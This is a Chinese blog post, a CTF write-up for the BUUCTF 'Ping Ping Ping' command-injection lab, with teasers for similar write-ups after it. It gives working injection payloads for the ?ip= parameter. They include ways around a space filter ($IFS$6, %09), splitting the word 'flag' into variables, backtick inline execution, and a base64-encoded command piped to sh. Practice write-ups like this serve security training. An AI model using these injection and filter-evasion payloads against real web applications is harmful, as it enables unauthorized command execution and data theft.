BUUCTF-Ping Ping Ping

于 2023-10-07 22:52:04 发布
阅读量226 收藏 2
点赞数 1
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51383898/article/details/133654999
版权

启动靶机,页面提示可以传入的参数为/?ip=
在这里插入图片描述尝试ping一下本地IP地址
在这里插入图片描述
尝试使用拼接符,空格(space)字符被过滤了,不得行

?ip=127.0.0.1 | pwd

在这里插入图片描述删除空格字符

?ip=127.0.0.1|pwd

在这里插入图片描述获取当前目录有哪些文件,发现有flag.php和index.php

?ip=127.0.0.1|ls

在这里插入图片描述尝试直接读取flag.php文件,不可行,忘记空格被过滤了

?ip=127.0.0.1|cat flag.php

在这里插入图片描述

命令执行常见空格绕过方法:
$IFS              

$IFS$6                               ——后面的数字6换成其他数字也行

${IFS} 

<

<>

{cat,flag.php}                      ——这里把,替换成了空格键

%20                                     ——代表space键

%09                                     ——代表Tab键

绕过了空格,flag又被过滤了
在这里插入图片描述这时候,还有一个index.php源码文件,尝试读取

?ip=127.0.0.1|cat$IFS$6index.php

在这里插入图片描述查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来检索字符串中是否存在符合正则表达式模式的子字符串,并将结果存储在一个数组中,返回值是匹配成功的次数
也就是说,含有f l a g四个字样,都会被过滤

1.拼接绕过法

将flag字符串,拆分,然后进行组合

playload: ?ip=127.0.0.1;y=ag;x=fl;cat$IFS$6$x$y.php
y=g;x=fla;$x$y
y=ag;x=fl;$x$y
y=lag;x=f;$x$y

在这里插入图片描述f12,查看页面源代码,成功获取flag
在这里插入图片描述

2.内联执行

内联执行就是linux下将反引号输出的内容作为我们命令的输入,可以看到源代码并没有将反引号 ` 进行过滤,所以可以考虑将 ls 的内容进行cat的输入

playload:
?ip=127.0.0.1;cat$IFS$6`ls`

实际等效于:
cat flag.php;cat index.php

在这里插入图片描述

3.sh编码绕过(base64编码)

echo 命令编码|base64 -d|sh
//对base64编码的字符串进行解码,然后将解码后的字符串输出
sh 可以更换为 bash ,此处将 bash 过滤了

playload:
cat flag.php的base64编码:Y2F0IGZsYWcucGhw

echo Y2F0IGZsYWcucGhw|base64 -d|sh

加上绕过空格:
?ip=127.0.0.1;echo$IFS$6Y2F0IGZsYWcucGhw|base64$IFS$6-d|sh

在这里插入图片描述

weixin_51383898
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5009
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
http-ping工具
12-03
-h header-line Pass the given header line as-is in each ping request. For example, add a host header like this: -h \"Host: www.site1.com\" Be sure to surround the header-line with quotes. You can ...
BUUCTF ping ping ping
vsdvscs的博客
05-10 172
BUUCTF ping ping ping 打开场景的时候我是一脸懵逼的那就看看源码吧还是一脸懵逼。 可以继续懵逼。 那既然人家人家都让我们ping ping ping了那就ping一下吧(使用GET方法传递的ip地址) 返回了一个我们平时用cmd也可以实现的作用,那么就猜想一下,我们尝试去直接凭借一下命令让他把flag给我们打印出来(domg,domg) 抱着满心的欢喜然后给我返回了一个这个: 看来这样是不能成功了(大概率是他过滤了一些东西·) 所以我们不能过执行命令,那
buuctf-ping ping ping
m0_62094846的博客
11-15 636
ping地址成功了,再看看目录 直接有flag,尝试使用,但是过滤了空格 绕过空格方式 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt (28条消息) Linux下绕过空格的方式总结_北陌的CSDN博客-CSDN博客_空格绕过 一个个尝试 发现t$IFS$9有用 但是又过滤了flag,那没有办法再绕过了,只能试试index.php 可...
Buuctf Ping Ping Ping
Dexret的博客
12-06 561
打开该靶机 判断该题需要我们传参进去,加上标题提示,应该为命令注入题目 输入ls查看目录 发现有个flag.php文件 查看该flag.php文件,发现空格都被过滤掉了 利用$IFS$1替代空格,发现flag也被过滤掉了 查看一下index.php 发现该题过滤了很多东西 这里我们可以利用linux中反引号的内联执行来做这道题 linux中cat `ls`,会直接输出目录下文件内的内容 payload ?ip=127.0.0.1|cat$IFS$1`ls`..
BUUCTFPing Ping Ping
金 帛的博客
02-20 6485
BUUCTFWP,关于一些waf的绕过
node-net-ping:网平
06-15
该模块实现了对ICMP Echo (ping) 支持。 此模块使用: npm install net-ping 它使用require()函数加载: var ping = require ("net-ping"); 然后可以创建一个 ping 会话来 ping 或跟踪到许多主机的路由: var...
python-ping:python ping
05-03
Python平使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] hostpositional arguments: host Target hostoptional arguments: -h, --help ...
window下可用的arp-ping工具
最新发布
01-03
window下可用的arp-ping工具
Delphi-Ping.rar_delphi ping
09-19
Delphi實現 網路 Ping操作編程
buuctf-Ping Ping Ping
Sacrifice_li的博客
09-25 1759
进来页面简单粗暴,就知道是个命令注入了: 那没什么好说的,就一个个测试呗 依据命令注入来看,最常见的是ls和pwd,发现均可以执行,发现在当前目录下存在一个flag.php以及index.php 在未打开index.php之前发现: ①没有过滤 ; | 以及|| ②过滤的内容有:" ",(),<>,\,/ 以及空格 做到这里实际上我就卡住了,我尝试了各种方式譬如:%0,%00,\0,/0./**/,来绕过空格过滤发现都不行,接着去网上搜索了一下如何绕过bash的空格过滤...
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2672
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
BUUCTFWebPing Ping Ping
qq_70434663的博客
03-02 735
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
Buuctf [GXYCTF2019]Ping Ping Ping
qq_52718293的博客
06-07 153
打开之后是一个ping的命令,我们可以先尝试着试一下ping命令 发现确实是有回显的,我们可以先查看一下目录,ls一下 发现有两文件,有一个flag.php 然后我们可以尝试一下cat flag.php 尝试之后发现是过滤了空格,准备用/* */绕过空格,然后就。。。发现又被过滤了 然后我准备换一个绕过空格%09 然后又发现被过滤了,不过这次是flag被过滤了 既然遇到了空格过滤,那小瑶就稍稍总结一下绕过空格 ${IFS}替换 $IFS$1替换 ${IFS替换 %20替换 <和<>重
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1221
BUUctf [GXYCTF2019]Ping Ping Ping
buuctfPing Ping Ping(命令执行)
zzqzzq11的博客
08-06 1293
buuctf
BUUCTF-[GXYCTF2019]Ping Ping Ping
qq_62875941的博客
12-28 373
打开链接 /?ip=(GET传参方式) 这题跟[ACTF2020 新生赛]Exec1差不多 那我们先看看有啥文件 /?ip=;ls或者/?ip=127.0.0.1;ls (ip地址写啥都行,其中127.0.0.1ping的是本机的地址) 发现里面有flag.php文件 但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久 下面来总结一下常见的绕过方法 1.空格 (1)%20 (2)%09 (3)<> (4)$..
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 670
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat$IFS$9`ls`。这样可以获取到flag.php和index.php这两个文件名。然而,关于如何绕过flag的过滤,引用[1]中并没有提到具体的方法。因此,需要进一步的信息才能回答这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值